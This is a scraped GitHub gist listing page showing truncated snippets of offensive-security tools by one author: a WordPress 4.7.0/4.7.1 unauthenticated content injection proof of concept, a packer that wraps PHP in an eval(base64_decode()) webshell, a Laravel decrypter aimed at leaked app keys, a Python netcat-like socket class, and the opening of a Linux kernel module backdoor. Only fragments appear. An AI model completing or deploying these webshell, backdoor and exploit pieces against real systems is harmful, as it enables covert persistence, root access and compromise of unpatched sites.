Skip to content

Instantly share code, notes, and snippets.

View sock5puppet's full-sized avatar

sock5puppet sock5puppet

0 followers · 2 following
View GitHub Profile
@leonjza
leonjza / inject.py
Last active October 23, 2024 01:06
Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# 2017 - @leonjza
#
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Usage example:
#
# List available posts:
#
# $ python inject.py http://localhost:8070/
@leonjza
leonjza / pack_shell.py
Created June 16, 2016 19:52
PHP Webshell with Packer
import base64
import sys
import re
SHELL = "<?php eval(base64_decode(\"{shell}\"));"
with open(sys.argv[1]) as f:
source = f.readlines()
source = ''.join(source).replace('\n', '')
source = source.replace('<?php', '')
@leonjza
leonjza / crypt.php
Last active May 18, 2022 15:34
Laravel ~5.1 encryptor / decryptor.
<?php
/*
* Quick 'n Dirty Laravel 5.1 decrypter.
*
* Based directly off the source code at:
* https://github.com/laravel/framework/blob/5.1/src/Illuminate/Encryption/Encrypter.php
*
* Have access to an application key from a .env?
* Have some encrypted data you want to decrypt?
* Well: (new Crypt($key))->decrypt($payload); should have you sorted
@leonjza
leonjza / netcat.py
Last active September 19, 2024 23:56
Python Netcat
import socket
class Netcat:
""" Python 'netcat like' module """
def __init__(self, ip, port):
self.buff = ""
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
@leonjza
leonjza / rooted.c
Created August 11, 2014 15:01
Linux Pluggable Kernel Module Backdoor
#include <linux/module.h> /* Needed by all modules */
#include <linux/kernel.h> /* Needed for KERN_INFO */
#include <linux/init.h> /* Needed for the macros */
/* For our shell ^_^ */
#include<linux/kmod.h>
int get_root (void)
{